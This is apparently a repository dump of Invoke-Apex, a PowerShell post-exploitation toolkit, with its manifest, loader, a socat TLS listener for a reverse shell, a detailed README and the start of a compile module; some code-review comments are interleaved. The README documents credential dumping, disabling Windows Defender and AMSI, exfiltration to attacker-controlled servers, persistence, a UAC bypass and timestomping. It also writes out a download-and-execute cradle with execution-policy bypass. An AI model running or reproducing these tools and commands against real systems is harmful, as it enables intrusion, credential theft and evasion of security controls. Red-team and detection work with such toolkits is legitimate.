├── Invoke-Apex.psd1 ├── Invoke-Apex.psm1 ├── LICENSE ├── Listener.sh ├── README.md ├── img ├── Invoke-Connect.png ├── Invoke-Creds.png ├── Invoke-DefenderTools.png ├── Invoke-Execute.png └── Invoke-MitreReference.png └── modules ├── Invoke-Apex.ps1 ├── Invoke-Compile.ps1 ├── Invoke-Connect.ps1 ├── Invoke-Creds.ps1 ├── Invoke-DefenderTools.ps1 ├── Invoke-Download.ps1 ├── Invoke-Execute.ps1 ├── Invoke-Exfil.ps1 ├── Invoke-GlassWireExceptions.ps1 ├── Invoke-MitreReference.ps1 ├── Invoke-Persistence.ps1 ├── Invoke-Privesc.ps1 ├── Invoke-Sysinfo.ps1 ├── Invoke-UACBypass.ps1 └── Invoke-Utility.ps1 /Invoke-Apex.psd1: -------------------------------------------------------------------------------- 1 | # 2 | # Module manifest for module 'Invoke-Apex' 3 | # 4 | # Generated by: Fabrizio Siciliano (@0rbz_) 5 | # 6 | # Generated on: 01/11/2019 7 | # 8 | 9 | @{ 10 | 11 | # Script module or binary module file associated with this manifest 12 | ModuleToProcess = 'Invoke-Apex.psm1' 13 | 14 | # Version number of this module. 
15 | ModuleVersion = '1.0.3' 16 | 17 | # ID used to uniquely identify this module 18 | GUID = 'add2d77c-ffcf-4d41-a578-600f6184ba12' 19 | 20 | # Author of this module 21 | Author = 'Fabrizio Siciliano (@0rbz_)' 22 | 23 | # Company or vendor of this module 24 | CompanyName = '' 25 | 26 | # Copyright statement for this module 27 | Copyright = 'BSD 3-Clause' 28 | 29 | # Description of the functionality provided by this module 30 | Description = 'Invoke-Apex - PowerShell Post-Exploitation Toolkit' 31 | 32 | # Minimum version of the Windows PowerShell engine required by this module 33 | PowerShellVersion = '3.0' 34 | 35 | # Name of the Windows PowerShell host required by this module 36 | PowerShellHostName = '' 37 | 38 | # Minimum version of the Windows PowerShell host required by this module 39 | PowerShellHostVersion = '' 40 | 41 | # Minimum version of the .NET Framework required by this module 42 | DotNetFrameworkVersion = '' 43 | 44 | # Minimum version of the common language runtime (CLR) required by this module 45 | CLRVersion = '' 46 | 47 | # Processor architecture (None, X86, Amd64, IA64) required by this module 48 | ProcessorArchitecture = '' 49 | 50 | # Modules that must be imported into the global environment prior to importing this module 51 | RequiredModules = @() 52 | 53 | # Assemblies that must be loaded prior to importing this module 54 | RequiredAssemblies = @() 55 | 56 | # Script files (.ps1) that are run in the caller's environment prior to importing this module 57 | ScriptsToProcess = @() 58 | 59 | # Type files (.ps1xml) to be loaded when importing this module 60 | TypesToProcess = @() 61 | 62 | # Format files (.ps1xml) to be loaded when importing this module 63 | FormatsToProcess = @() 64 | 65 | # Modules to import as nested modules of the module specified in ModuleToProcess 66 | NestedModules = @() 67 | 68 | # Functions to export from this module 69 | FunctionsToExport = '*' 70 | 71 | # Cmdlets to export from this module 72 | CmdletsToExport = '*' 
73 |
74 | # Variables to export from this module
75 | VariablesToExport = '*'
76 |
77 | # Aliases to export from this module
78 | AliasesToExport = '*'
79 |
80 | # List of all modules packaged with this module
81 | ModuleList = @()
82 |
83 | # List of all files packaged with this module
84 | FileList = @()
85 |
86 | # Private data to pass to the module specified in ModuleToProcess
87 | PrivateData = ''
88 |
89 | }
90 |
--------------------------------------------------------------------------------
/Invoke-Apex.psm1:
--------------------------------------------------------------------------------
1 | <#
2 | .SYNOPSIS
3 | PowerShell Post-Exploitation Toolkit
4 |
5 | .LINK
6 | https://www.github.com/securemode/Invoke-Apex
7 |
8 | .EXAMPLE
9 |
10 | PS> Import-Module .\Invoke-Apex.psd1
11 | PS> Invoke-Apex
12 |
13 | Author: Fabrizio Siciliano (@0rbz_)
14 |
15 | #>
16 |
# NOTE(review): the module body dot-sources every *.ps1 under $PWD\modules, i.e. relative
# to the caller's current working directory rather than to the module's own location
# ($PSScriptRoot). Importing from any other directory loads no functions, and any .ps1
# present in a "modules" folder of the current directory is executed at import time.
17 | Get-ChildItem -Path $PWD\modules\*.ps1 | Foreach-Object{ . $_.FullName }
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | BSD 3-Clause License
2 |
3 | Copyright (c) 2019, SecureMode
4 | All rights reserved.
5 |
6 | Redistribution and use in source and binary forms, with or without
7 | modification, are permitted provided that the following conditions are met:
8 |
9 | * Redistributions of source code must retain the above copyright notice, this
10 | list of conditions and the following disclaimer.
11 |
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 | this list of conditions and the following disclaimer in the documentation
14 | and/or other materials provided with the distribution.
15 |
16 | * Neither the name of the copyright holder nor the names of its
17 | contributors may be used to endorse or promote products derived from
18 | this software without specific prior written permission.
19 |
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 |
--------------------------------------------------------------------------------
/Listener.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # requires socat
3 |
# NOTE(review): only $1 is validated here. When $2 is omitted, PORT (line 11) is empty
# and the socat address on line 18 degrades to "openssl-listen:,keepalive,..." with no
# port, so the failure surfaces from socat rather than from this usage check. Checking
# (( $# == 2 )) and that "$1" is a readable file would fail fast with the usage text.
4 | if [[ $1 == "" ]]; then
5 | echo "Usage: $0 [PEM_FILE] [PORT]"
6 | echo "Example: $0 cert.pem 443"
7 | exit 1;
8 | fi
9 |
10 | PEM="$1"
11 | PORT="$2"
# NOTE(review): `which` is not POSIX and prints nothing when the tool is absent, so a
# missing socat leaves SOCAT empty and line 18 fails with a "command not found" on the
# address string. Portable form: SOCAT=$(command -v socat) || { echo "socat not found" >&2; exit 1; }
12 | SOCAT=$(which socat)
13 |
14 | printf "\n### aPeX Listener Help ### \n\n---> Type 'Invoke-Apex' at the aPeX Listener Prompt below and press [ENTER]\n---> Then launch an aPeX agent or Invoke-Connect from the target machine.\n---> CTRL-C to close the connection.\n"
15 |
16 | date=$(date)
# NOTE(review): $date is expanded inside the printf FORMAT string; a '%' in
# locale-formatted date output would be read as a conversion specifier. Pass it as
# an argument instead: printf '\n%s \n[aPeX Listener Prompt]: ' "$date"
17 | printf "\n$date \n[aPeX Listener Prompt]: "
# NOTE(review): $SOCAT, $PORT and $PEM are unquoted, so a PEM path containing spaces
# or glob characters is word-split. verify=0 disables peer-certificate verification and
# method=TLS1 selects TLS 1.0 only (deprecated by RFC 8996); both are worth stating in
# the header comment rather than leaving implicit in the option string.
18 | $SOCAT openssl-listen:$PORT,keepalive,method=TLS1,reuseaddr,cert=$PEM,verify=0 stdout
19 |
20 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Invoke-Apex
2 |
3 | ```
4 | 8888888b. Y88b d88P
5 | 888 Y88b Y88b d88P
6 | 888 888 Y88o88P
7 | 8888b. 888 d88P .d88b. 
Y888P 8 | "88b 8888888P" d8P Y8b d888b 9 | .d888888 888 88888888 d88888b 10 | 888 888 888 Y8b. d88P Y88b 11 | "Y888888 888 "Y8888 d88P Y88b 12 | Y88b 13 | Post-Exploitation Toolkit Y88b 14 | By: Fabrizio Siciliano (@0rbz_) V1.0 15 | ``` 16 | 17 | ```Invoke-Apex``` is a PowerShell-based toolkit consisting of a collection of techniques and tradecraft for use in red team, post-exploitation, adversary simulation, or other offensive security tasks.  It can also be useful in identifying lapses in "malicious" activity detection processes for defenders as well. 18 | 19 | Each technique or method in the toolkit is mapped back to a [Mitre ATT&CK](https://attack.mitre.org/) Technique ID where applicable, and the techniques and modules which they can be found in, can be viewed with the ```Invoke-MitreReference -Help``` command. See the section "[The Mitre ATT&CK Reference Component](https://github.com/securemode/Invoke-Apex#the-mitre-attck-reference-component)" for more info! 20 | 21 | ```Invoke-Apex``` is a work-in-progress, so updates to modules, and additional capability can be expected somewhat regularly as time allows. 22 | 23 | ## General Usage 24 | 25 | ### Importing the Toolkit 26 | ```PS> Import-Module .\Invoke-Apex.psd1``` 27 | 28 | All individual "modules" (cmdlets) can of course also be dot-sourced into the current session: 29 | 30 | ```PS> . 
.\Invoke-DefenderTools.ps1``` 31 | 32 | Or can be invoked using a traditional ```DownloadString``` cradle, etc: 33 | 34 | ```C:\> powershell -ep bypass -nop -noni "iex (New-Object Net.Webclient).DownloadString('https://server/Invoke-DefenderTools.ps1'); Invoke-DefenderTools -GetExcludes"``` 35 | 36 | ### Listing all available functions 37 | ```PS> Invoke-Apex``` 38 | ``` 39 | PS> Invoke-Apex 40 | 41 | [*] Usage: [Function-Name] -Help (Shows Help for each command within a function) 42 | [*] Usage: [Function-Name] -List (Summary list of available commands within a function) 43 | 44 | [*] Example: Invoke-DefenderTools -Help 45 | [*] Example: Invoke-DefenderTools -List 46 | 47 | 48 | CommandType Name Version Source 49 | ----------- ---- ------- ------ 50 | Function Invoke-Apex 1.0 Invoke-Apex 51 | Function Invoke-Compile 1.0 Invoke-Apex 52 | Function Invoke-Connect 1.0 Invoke-Apex 53 | Function Invoke-Creds 1.0 Invoke-Apex 54 | Function Invoke-DefenderTools 1.0 Invoke-Apex 55 | Function Invoke-Download 1.0 Invoke-Apex 56 | Function Invoke-Execute 1.0 Invoke-Apex 57 | Function Invoke-Exfil 1.0 Invoke-Apex 58 | Function Invoke-GlasswireExceptions 1.0 Invoke-Apex 59 | Function Invoke-MitreReference 1.0 Invoke-Apex 60 | Function Invoke-Persistence 1.0 Invoke-Apex 61 | Function Invoke-Privesc 1.0 Invoke-Apex 62 | Function Invoke-Sysinfo 1.0 Invoke-Apex 63 | Function Invoke-UACBypass 1.0 Invoke-Apex 64 | Function Invoke-Utility 1.0 Invoke-Apex 65 | 66 | ``` 67 | ### Getting help for a function / listing function commands 68 | Each functions' available commands (or parameters) can be listed with the ```-Help``` parameter or with the ```-List``` parameter for a brief list of commands. 
69 | 70 | ```PS> Invoke-DefenderTools -Help``` 71 | ``` 72 | PS> Invoke-DefenderTools -Help 73 | 74 | ### Invoke-DefenderTools Help ### 75 | --------------------------------- 76 | Available Invoke-DefenderTools Commands: 77 | ---------------------------------------- 78 | |----------------------------------------------------------------------| 79 | | -GetExcludes | 80 | |----------------------------------------------------------------------| 81 | 82 | [*] Description: Gets any current exclude files/paths/extensions 83 | currently configured in Windows Defender via the Registry. 84 | 85 | [*] Usage: Invoke-DefenderTools -GetExcludes 86 | 87 | [*] Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 88 | [*] Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 89 | 90 | |----------------------------------------------------------------------| 91 | | -AddExclude [-Path] path | 92 | |----------------------------------------------------------------------| 93 | 94 | [*] Description: Adds a path exclude to Windows Defender. 
95 | (Requires Elevation) 96 | 97 | [*] Usage: Invoke-DefenderTools -AddExclude -Path C:\temp 98 | 99 | [*] Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 100 | [*] Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 101 | <...snip...> 102 | 103 | ``` 104 | 105 | ```PS> Invoke-DefenderTools -List``` 106 | 107 | ``` 108 | PS> Invoke-DefenderTools -List 109 | 110 | Invoke-DefenderTools Command List: 111 | ---------------------------------- 112 | Invoke-DefenderTools -GetExcludes 113 | Invoke-DefenderTools -AddExclude [-Path] path 114 | Invoke-DefenderTools -DisableRtm 115 | Invoke-DefenderTools -DisableAMSI 116 | ``` 117 | 118 | 119 | ### The Mitre ATT&CK Reference component 120 | 121 | ```PS> Invoke-MitreReference -Help``` 122 | ``` 123 | PS> Invoke-MitreReference -Help 124 | 125 | |------------------------------------------------------------------| 126 | | ### MITRE ATT&CK TECHNIQUE REFERENCE ### | 127 | |------------------------------------------------------------------| 128 | 129 | <...snip...> 130 | 131 | Module: Invoke-Creds 132 | -------------------- 133 | Mitre ATT&CK Ref: T1056 (Input Capture) 134 | Mitre ATT&CK Ref: T1081 (Credentials in Files) 135 | Mitre ATT&CK Ref: T1003 (Credential Dumping) 136 | 137 | 138 | Module: Invoke-DefenderTools 139 | ---------------------------- 140 | Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 141 | Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 142 | 143 | 144 | Module: Invoke-Download 145 | ----------------------- 146 | Mitre ATT&CK Ref: T1105 (Remote File Copy) 147 | 148 | 149 | Module: Invoke-Execute 150 | ---------------------- 151 | Mitre ATT&CK Ref: T1086 (PowerShell) 152 | Mitre ATT&CK Ref: T1085 (Rundll32) 153 | Mitre ATT&CK Ref: T1047 (Windows Management Instrumentation) 154 | Mitre ATT&CK Ref: T1220 (XSL Script Processing) 155 | Mitre ATT&CK Ref: T1028 (Windows Remote Management) 156 | Mitre ATT&CK Ref: T1218 (Signed Binary Proxy Execution) 157 | 158 | <...snip...> 159 | ``` 160 | 161 | 
You can also look up which [Mitre ATT&CK](https://attack.mitre.org/) techniques are in use, and in which modules, with the ```-Tid``` parameter and specifying a Mitre ATT&CK Technique ID as a value: 162 | 163 | ```PS> Invoke-MitreReference -Tid 1352``` 164 | ``` 165 | PS> Invoke-MitreReference -Tid 1352 166 | 167 | Modules using Mitre ATT&CK Ref: T1352 (C2 Protocol Development): 168 | 169 | [+] Module: Invoke-Connect 170 | 171 | ``` 172 | 173 | # Available Functions / Commands 174 | 175 | ## Invoke-Apex 176 | ```Invoke-Apex``` (Lists all available functions) 177 | 178 | ## Invoke-Compile 179 | Compiles some of Apex's functionality to .NET Assemblies. 180 | 181 | #### Available Commands: 182 | 183 | ```-CopySAM``` (Invoke-Creds -CopySAM functionality compiled as a .NET Assembly.) 184 | 185 | ```-WiFiCreds``` (Invoke-Creds -WiFiCreds functionality compiled as a .NET Assembly.) 186 | 187 | ```-SysInfo``` (Compiles a .NET Assembly that Dumps everything from the "Invoke-Sysinfo" function.) 188 | 189 | ## Invoke-Connect 190 | Transfers all Apex functionality to a remote SSL listener, and also functions as a non-interactive powershell reverse "shell" if invoked as a stand-alone cmdlet. (SSL-enabled listener is required) 191 | 192 | ![screenshot](https://raw.githubusercontent.com/securemode/Invoke-Apex/master/img/Invoke-Connect.png) 193 | 194 | Usage: ```PS> Invoke-Connect -ListenerIp 192.168.1.1 -ListenerPort 443``` 195 | 196 | ## Invoke-Creds 197 | Several commands to assist in obtaining credentials from the target host. 
198 | 199 | #### Available Commands: 200 | 201 | ```-WiFiCreds``` (Dumps saved Wireless Credentials) 202 | 203 | ```-IeCreds``` (Dumps saved IE credentials) 204 | 205 | ```-AuthPrompt``` (Invokes an authentication prompt to the target and captures any entered credentials) 206 | 207 | ```-PuttyKeys``` (Dumps any saved putty sessions/keys/passwords) 208 | 209 | ```-CopySAM``` (Utilizes Volume Shadow Copy to copy the SAM, SYSTEM and SECURITY files for offline parsing.) 210 | 211 | ```-CopyNtds``` (Utilizes Volume Shadow Copy to copy the NTDS.dit and SYSTEM files for offline parsing.) 212 | 213 | 214 | 215 | ## Invoke-DefenderTools 216 | Several commands to assist in interacting with Windows Defender. 217 | #### Available Commands: 218 | 219 | ```-GetExcludes``` (Gets any currently excluded files/paths/extensions from Windows Defender via the Registry) 220 | 221 | ```-AddExclude``` (Adds a Windows Defender exclude path. Requires elevation.) 222 | 223 | ```-DisableRtm``` (Disables Windows Defender Real-Time Monitoring. Requires elevation.) 224 | 225 | ```-DisableAmsi``` (Disables AMSI for a new PowerShell session.) 226 | 227 | ## Invoke-Download 228 | Commands for downloading files to the target system. 229 | #### Available Commands: 230 | 231 | ```-PsDownload``` (Downloads a file to the target system using a traditional powershell 'DownloadFile' cradle.) 232 | 233 | ```-CertUtil``` (Uses certutil.exe to download a file to the target system. Uses the "VerifyCTL" method.) 234 | 235 | ```-EsentUtl``` (Uses Esentutil.exe to download a file from a remote UNC Path.) 236 | 237 | ## Invoke-Execute 238 | Execute commands on a target system using a number of different "living-off-the-land" techniques. 239 | #### Available Commands: 240 | 241 | ```-DownloadString``` (Executes a remote powershell script in memory using the "DownloadString" method.) 242 | 243 | ```-XmlHTTP``` (Executes a remote powershell script in memory using Msxml2.XMLHTTP COM Object.) 
244 | 245 | ```-RunDLL``` (Executes system commands or arbitrary code using a number of different "rundll32" methods.) 246 | 247 | Available ```Invoke-Execute -Rundll``` methods: 248 | 249 | ``` 250 | [1] shell32.dll,Control_RunDLL 251 | [2] shell32.dll,Control_RunDLLA 252 | [3] IEAdvpack.dll,RegisterOCX 253 | [4] zipfldr.dll,RouteTheCall 254 | [5] advpack.dll,RegisterOCX 255 | [6] pcwutl.dll,LaunchApplication 256 | ``` 257 | 258 | 259 | ```-WmicExec``` (Executes a local command via "wmic process call create".) 260 | 261 | ```-WmicXsl``` (Utilizes "wmic process get brief" to execute a built-in XSL stylesheet containing JScript ActiveXObject command.) 262 | 263 | ```-OdbcExec``` (Uses odbcconf.exe to execute a local DLL or DLL at a UNC path.) 264 | 265 | ```-WinRmWmi``` (Executes a command from a built-in XML file via winrm.vbs.) 266 | 267 | ```-SignedProxyDll``` (Executes a DLL via an existing signed binary.) 268 | 269 | Available ```Invoke-Execute -SignedProxyDll``` methods: 270 | 271 | ``` 272 | [1] AdobeARM.exe 273 | ``` 274 | 275 | ```-SignedProxyExe``` (Executes an EXE via an existing signed binary.) 276 | 277 | Available ```Invoke-Execute -SignedProxyExe``` methods: 278 | 279 | ``` 280 | [1] pcalua.exe 281 | [2] SynTPEnh.exe 282 | ``` 283 | 284 | ## Invoke-Exfil 285 | Allows for moving files off of a target system to a remote system. 286 | #### Available Commands: 287 | ```-SmbExfil``` (Copies a local file over SMB to a remote SMB Server/Share.) 288 | 289 | ```-RestExfil``` (Uses PowerShell's ```Invoke-RestMethod``` and "POST" to Base64 encode and send a file to an attacker-controlled web server.) 290 | 291 | ```-TransferShExfil``` (Uploads a file to the https://transfer.sh file upload service. A URL to the file will be returned and is valid for 14 days. "Invoke-WebRequest" and PUT is utilized for this function.) 
292 | 293 | ```-InstallScpClient``` (Installs Windows SSH and SCP clients via a Windows capability package using the Add-WindowsCapability cmdlet and will spawn dismhost.exe as a child-process of powershell. If PowerShell is detected as version 2.0, it will install it with dism.exe. Both options require elevation.) 294 | 295 | 296 | ## Invoke-GlassWireExceptions 297 | Dumps any program exceptions configured in GlassWire Endpoint Protection software. 298 | 299 | Usage: ```PS> Invoke-GlassWireExceptions``` 300 | 301 | ## Invoke-MitreReference 302 | 303 | (Each technique or method in the toolkit is mapped back to a [Mitre ATT&CK](https://attack.mitre.org/) Technique ID where applicable, and the techniques and modules which they can be found in, can be viewed with the ```Invoke-MitreReference -Help``` command. This cmdlet can also be used to search for specific MITRE ATT&CK Technique ID's with the ```-Tid``` parameter.) 304 | 305 | Usage: 306 | 307 | ```PS> Invoke-MitreReference -Help``` 308 | 309 | ```PS> Invoke-MitreReference -Tid 1055``` 310 | 311 | 312 | ## Invoke-Persistence 313 | Several methods that allow persisting on a target system. 314 | #### Available Commands: 315 | ```-StartupLnk``` (Drops a .LNK file in the current user's startup directory that executes a remotely hosted PowerShell script in memory using the "DownloadString" method. If the ```-Encoded``` parameter is appended to the command line, the downloadstring will be encoded and will use PowerShell's ```-EncodedCommand``` function to execute.) 316 | 317 | ```-Adduser``` (Adds a local user. If the ```-Admin``` parameter is specified, adds an existing user to the local Administrators group.) 318 | 319 | ```-EnableRdp``` (Enables remote desktop on the target, and adds an existing user to the Remote Desktop users group.) 320 | 321 | ```-PsTask``` (Generates a scheduled task that utilizes Net.Webclient Downloadstring method to a remote PowerShell script.) 
322 | 323 | ## Invoke-PrivEsc 324 | Commands for either elevating to a higher integrity-level or elevating privileges via other means. 325 | #### Available Commands: 326 | 327 | ```-UnquotedPaths``` (Checks for auto start services configured without quotes, useful for identifying services vulnerable to unquoted service paths exploitation.) 328 | 329 | ## Invoke-Sysinfo 330 | Gathers information about a system. 331 | #### Available Commands: 332 | ```-Os``` (Displays Basic Operating System Information) 333 | 334 | ```-Env``` (Displays Environment Variables Information) 335 | 336 | ```-Arch``` (Displays system architecture) 337 | 338 | ```-Drives``` (Displays current drives) 339 | 340 | ```-Users``` (Displays Users) 341 | 342 | ```-LocalAdmins``` (Displays local admins) 343 | 344 | ```-DomainAdmins``` (Displays Domain Admins) 345 | 346 | ```-Privs``` (Displays current user privileges) 347 | 348 | ```-HotFixes``` (Displays installed hotfixes) 349 | 350 | ```-CheckElevated``` (Checks if current user PS process is elevated) 351 | 352 | ```-Shares``` (Displays shared drives on the system) 353 | 354 | ```-LoggedOn``` (Displays currently interactively logged-on users) 355 | 356 | ```-Apps``` (Retrieves installed applications) 357 | 358 | ```-Procs``` (Displays current running processes) 359 | 360 | ```-Services``` (Displays current running and stopped services) 361 | 362 | ```-Tasks``` (Displays non-Microsoft scheduled tasks) 363 | 364 | ```-Av``` (Retrieves installed AntiVirus software information) 365 | 366 | ```-LangMode``` (Checks powershell current language mode) 367 | 368 | ```-PsVersion``` (Displays PowerShell version) 369 | 370 | ```-DnsCache``` (Dumps DNS Cache) 371 | 372 | ```-PsHistory``` (Dumps PowerShell Commandline History) 373 | 374 | ```-ClipBoard``` (Dumps Clipboard Contents) 375 | 376 | ```-RecentDocs``` (Dumps recently accessed documents) 377 | 378 | ```-IpConfig``` (Displays Network Interfaces information) 379 | 380 | ```-NetStat``` (Displays Active 
Network Connections Information) 381 | 382 | ```-DumpAll``` (Dumps all of the above modules information into %appdata%\sysinfo.txt) 383 | 384 | ## Invoke-UACBypass 385 | 386 | #### Available Commands: 387 | 388 | ```-MMCCom``` (Downloads a remotely hosted DLL payload and executes a UAC bypass using CLSID 0A29FF9E-7F9C-4437-8B11-F424491E3931 "InProcServer"Event Viewer (mmc.exe) Method. Requires Admin User with UAC set to "Default". Tested on Win 10.0.16299) 389 | 390 | ## Invoke-Utility 391 | 392 | Miscellaneous Utilities 393 | 394 | #### Available Commands: 395 | 396 | ```-TcpScan``` (Simple TCP Port Scanner.) 397 | 398 | Note: This is a SLOW scanner, one probe every second. The slow scanning is intentional as it helps to evade things like Symantec's Endpoint Protection firewall. The idea behind this is to generate as little noise as possible. 399 | 400 | ```-TimeStomp``` (Modifies a files' Creation Time to that of C:\windows\system32\cmd.exe. The 'TimeOf' parameter can be used to change the timestamp to match that of some other file.) 401 | 402 | 403 | ```-FindFile``` (Search for a file.) 404 | 405 | # Usage Screenshots 406 | 407 | ## Invoke-Creds 408 | 409 | ![screenshot](https://raw.githubusercontent.com/securemode/Invoke-Apex/master/img/Invoke-Creds.png) 410 | 411 | ## Invoke-DefenderTools 412 | 413 | ![screenshot](https://raw.githubusercontent.com/securemode/Invoke-Apex/master/img/Invoke-DefenderTools.png) 414 | 415 | ## Invoke-Execute 416 | 417 | ![screenshot](https://raw.githubusercontent.com/securemode/Invoke-Apex/master/img/Invoke-Execute.png) 418 | 419 | ## Invoke-MitreReference 420 | 421 | ![screenshot](https://raw.githubusercontent.com/securemode/Invoke-Apex/master/img/Invoke-MitreReference.png) 422 | 423 | 424 | # DISCLAIMER 425 | THIS SOFTWARE IS PROVIDED 'AS IS' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /img/Invoke-Connect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/password-reset/Invoke-Apex/81bfc10f3d8fef5f93c8809bd4f793cc8e0e196a/img/Invoke-Connect.png -------------------------------------------------------------------------------- /img/Invoke-Creds.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/password-reset/Invoke-Apex/81bfc10f3d8fef5f93c8809bd4f793cc8e0e196a/img/Invoke-Creds.png -------------------------------------------------------------------------------- /img/Invoke-DefenderTools.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/password-reset/Invoke-Apex/81bfc10f3d8fef5f93c8809bd4f793cc8e0e196a/img/Invoke-DefenderTools.png -------------------------------------------------------------------------------- /img/Invoke-Execute.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/password-reset/Invoke-Apex/81bfc10f3d8fef5f93c8809bd4f793cc8e0e196a/img/Invoke-Execute.png -------------------------------------------------------------------------------- /img/Invoke-MitreReference.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/password-reset/Invoke-Apex/81bfc10f3d8fef5f93c8809bd4f793cc8e0e196a/img/Invoke-MitreReference.png
--------------------------------------------------------------------------------
/modules/Invoke-Apex.ps1:
--------------------------------------------------------------------------------
1 | function Invoke-Apex {
2 |
3 | Write @"
4 |
5 |
6 | 8888888b. Y88b d88P
7 | 888 Y88b Y88b d88P
8 | 888 888 Y88o88P
9 | 8888b. 888 d88P .d88b. Y888P
10 | "88b 8888888P" d8P Y8b d888b
11 | .d888888 888 88888888 d88888b
12 | 888 888 888 Y8b. d88P Y88b
13 | "Y888888 888 "Y8888 d88P Y88b
14 | Y88b
15 | A Post-EXploitation toolkit Y88b
16 | By: Fabrizio Siciliano (@0rbz_) V1.0.3
17 |
18 | [*] Usage: [Function-Name] -Help (Shows Help for each command within a function)
19 | [*] Usage: [Function-Name] -List (Summary list of available commands within a function)
20 |
21 | [*] Example: Invoke-DefenderTools -Help
22 | [*] Example: Invoke-DefenderTools -List
23 |
24 | "@
25 |
26 | (Get-Command -Module Invoke-Apex).Name
# NOTE(review): "modules\" is resolved against the current working directory, not the
# module's own folder, and .count includes every entry (not only *.ps1). The reported
# figure is therefore only meaningful when the session is rooted at the toolkit directory,
# and it can disagree with the command list printed on line 26.
27 | $modnum = (get-childitem -Path modules\).count
28 | Write-Output "`nLoaded Modules: $modnum`n"
29 | }
--------------------------------------------------------------------------------
/modules/Invoke-Compile.ps1:
--------------------------------------------------------------------------------
1 | function Invoke-Compile {
2 | <#
3 |
4 | .SYNOPSIS
5 |
6 | Compiles some of Apex's functionality to .NET Assemblies. Executables will be written to $env:temp.
7 |
8 | .PARAMETER Help
9 | Displays Help
10 |
11 | .PARAMETER List
12 |
13 | Displays summary usage.
14 |
15 | .PARAMETER CopySAM
16 |
17 | Compiles a .NET Assembly that can be used to copy the SAM, SYSTEM and SECURITY files for offline parsing and cracking.
18 |
19 | .PARAMETER WiFiCreds
20 |
21 | Compiles a .NET Assembly that can be used to dump saved wireless credentials.
22 |
23 | .PARAMETER SysInfo
24 |
25 | Compiles a .NET Assembly that gathers information about the system. 
Will drop a "SysInfo.exe" in $env:temp. When executed, will write results to C:\windows\temp\SysInfo.txt. 26 | 27 | .EXAMPLE 28 | 29 | Compile: 30 | PS> Invoke-Compile -CopySAM 31 | 32 | Execute: 33 | C:\CopySAM.exe 34 | 35 | Compile: 36 | PS> Invoke-Compile -SysInfo 37 | 38 | Execute: 39 | C:\windows\temp\SysInfo.exe 40 | 41 | .NOTES 42 | 43 | Author: Fabrizio Siciliano (@0rbz_) 44 | 45 | #> 46 | 47 | [CmdletBinding()] 48 | param ( 49 | [Parameter(Position=1)] 50 | [Switch]$Help, 51 | [Switch]$List, 52 | 53 | [Parameter(Mandatory = $False)] 54 | [Switch]$CopySAM, 55 | 56 | [Parameter(Mandatory = $False)] 57 | [Switch]$WiFiCreds, 58 | 59 | [Parameter(Mandatory = $False)] 60 | [Switch]$SysInfo 61 | 62 | 63 | ) 64 | 65 | $X = (-join ((65..90) + (97..122) | Get-Random -Count 11 | foreach {[char]$_})) 66 | $Z = (-join ((65..90) + (97..122) | Get-Random -Count 5 | foreach {[char]$_})) 67 | $FWDir = $([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory()) 68 | $SmaDll = [PSObject].Assembly.Location 69 | $CsFile = "$env:temp\$Z.cs" 70 | $Compiler = "$FWDir" + "c?c.??e" 71 | 72 | 73 | if ($Help -eq $True) { 74 | Write @" 75 | 76 | ### Invoke-Compile Help ### 77 | --------------------------- 78 | Available Invoke-Compile Commands: 79 | ---------------------------------- 80 | 81 | |---------------------------------------------------------------------| 82 | | -CopySAM | 83 | |---------------------------------------------------------------------| 84 | 85 | [*] Description: Invoke-Creds -CopySAM functionality compiled as a 86 | .NET Assembly. 87 | 88 | Tested on Win 10 / .NET CLRVersion 4.0.30319.42000 89 | 90 | The resulting CopySAM.exe assembly requires admin rights to work. 
